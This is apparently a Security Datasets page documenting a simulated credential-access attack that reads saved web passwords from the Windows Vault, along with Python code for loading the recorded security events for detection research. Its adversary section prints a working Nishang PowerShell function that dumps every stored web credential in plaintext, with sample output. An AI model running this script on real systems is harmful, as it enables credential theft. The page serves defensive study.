Windows Vault Web Credentials

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/28

Modification Date

2020/10/28

Tactics

TA0004,TA0005

Techniques

T1055

Tags

None

Dataset Description

This dataset represents threat actors accessing the Windows Vault and reading web credentials saved.

Simulation Metadata

Tools

type

Name

Module

Manual

PowerShell

PowerShell

Adversary View

Add Web Credentials
-------------------
PS > $pv = New-Object Windows.Security.Credentials.PasswordVault
PS > $pw = New-Object Windows.Security.Credentials.PasswordCredential('http://ossemproject.com', 'pgustavo', 'Pass@Word')
PS >$pv.Add($pw)

Import Get-WebCredentials
-------------------------
function Get-WebCredentials
{
  <#
  .SYNOPSIS
  Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above)
  .DESCRIPTION
  This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script 
  also needs PowerShell v3 onwards and must be run from an elevated shell.
  .EXAMPLE
  PS > Get-WebCredentials
  .LINK
  https://github.com/samratashok/nishang
  #>
  [CmdletBinding()] Param ()
  
  
  #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage
  $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
  $VaultObj = new-object Windows.Security.Credentials.PasswordVault
  $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }
}

Run Get-WebCredentials
----------------------
PS C:\Users\wardog> Get-WebCredentials

UserName Resource                Password  Properties
-------- --------                --------  ----------
pgustavo http://ossemproject.com Pass@Word {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], ...


PS C:\Users\wardog>

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_windows_vault_web_credentials.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)